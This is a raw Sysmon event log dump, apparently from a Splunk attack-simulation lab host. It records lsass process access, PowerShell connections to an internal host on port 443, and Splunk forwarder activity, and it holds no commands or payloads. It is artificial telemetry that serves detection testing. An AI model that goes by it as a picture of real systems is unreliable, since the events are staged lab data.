13:15:56.703{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497157Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:56.703{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497156Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01033A256327BE35D1310B89420451D3,SHA256=43F5C872D1A5928CC6FCE292BF25ACB09CC8A328D1C21089FE1C332C7F9AD9E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.683{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50502-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.117{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50501-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000036497180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:03.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15EAF0E1318969534FB88352F690B9E,SHA256=B45D09E4FA86F16235EF6132DF935A2CF7E2D1A75F21CD6A3FAF14C3310FFC7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:04.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF9C7B5230A13598132DE97BFB520E81,SHA256=36EB87E05A53691E5645BADB31E12AA35D0ADFC51F70FEB8AE9E5ABA3A84764A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50504-false10.0.1.12-8000- 354300x800000000000000036497184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50503-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85FE3DB6D547AE8D7AFDA5D3994C95EA,SHA256=32DFF8D0F5EC41A8B73F3A9D78B264B2171AD23EA9A409CB80B165454D91521C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8250E3DD7AFD746D7036413F257BB369,SHA256=1B495B7F07C85822E61FA1984465EC3CC985CB3652ABAD78FBB1EE4B0422260E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:06.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75F6046FBFB9BC39ED8CF5DF78F52C7,SHA256=1152EE94B53503FBC5B6817F860EB20346A61A23CACB0C07ACAD0D3A685E4E87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.928{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:07.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.925{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.909{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87365111A6C32B9270BAD2FF00B683C5,SHA256=A8BF229A63022DE9817C40060CB06022A52A025BF4BBB1525AEEBBB4D9F57D96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.926{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3137BA80495BA1C933F37E1A719FD452,SHA256=0D34B568C0D2C90506F5230B9E39EB1A11E1CB1E7EB16C71C027F53348E87E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C50BB655CA4346424644C3AD198508C,SHA256=328F3F706205C935A29504B4F1379691A5FAD92E949EE12CDAAC6B72F0DA2C4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.760{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82964CBE385A0F657E531B29A6CA378,SHA256=B7D6310A49E6263AF1928E023157E48E1E040C24F2196138C7DA456847CC3217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.626{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 
13:16:08.624{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497198Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.623{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497197Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.608{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK 
driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036497196Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.076{B81B27B7-A097-6140-7856-04000000C801}69324544C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497208Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:09.790{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=752154B71FFB5442389A51644703B731,SHA256=80E3FACB5B9B4DD3DE90E00F1D81E0C561DA02B91ADC046BE75320AF0B4E6CBE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000036497210Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:10.822{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AEDDB0EF44C50569DDA1E0238635B6A0,SHA256=0BCA40B1002FBC3C00BE36B90D6E18CFBBAB3BADB0812BDF157ABB0A5253A7E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497209Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:10.190{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=59C1BED36047435A0A8F480A48BD4116,SHA256=C0AFD511D7F3CDFC0D34291B65925C89B026C48801B9830ACADE26123914ED22,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497212Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:11.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 